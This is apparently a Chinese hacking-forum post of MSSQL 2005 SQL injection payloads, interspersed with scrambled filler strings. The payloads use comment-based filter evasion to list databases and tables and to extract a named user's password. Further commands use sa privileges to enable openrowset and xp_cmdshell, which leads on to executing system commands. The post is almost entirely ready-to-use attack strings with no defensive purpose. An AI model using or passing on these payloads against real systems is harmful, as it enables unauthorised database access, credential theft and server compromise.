MSsql2005注入语句

admin

5 b& G' o* S2 |& a

8 _7 Y! d/ [, ^4 d: |" r' i9 I9 I[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
$ b# r+ h2 |2 u; A
. T" O; [7 t3 f% l9 O: g: C0 b爆表语句,somedb部份是所要列的数据库，红色数字1累加

: N1 W5 B* z' G& x* n
0 |& U* H! v& M$ E[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
, b2 {: x0 k8 I
7 q/ W( w" o7 D0 N0 z爆字段语句，爆表admin里user='icerover'的密码段
$ V5 w/ ^% ]2 S$ g' J

3 Q+ T# h) i7 K) M3 p7 L- w; S- {" q5 _[Copy to clipboard]CODE:
8 O3 S; l, a) e2 s* I**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

mssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
6 u" s, P! c- e" y) N' @) I$ Z开启openrowset


" \. J/ F9 Z: V  J[Copy to clipboard]CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
, U. S$ J4 \' }5 v. V& K/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

' [8 x$ ^4 M6 u! k7 h# O( @开启xp_cmdshell
6 h# d5 }- P; F% Q: a' E- D1 V

[Copy to clipboard]CODE:
& p5 z9 z$ ~' _9 H( y  EEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
8 q- y3 X4 A8 b7 w* W  eEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

ok,over~~晚安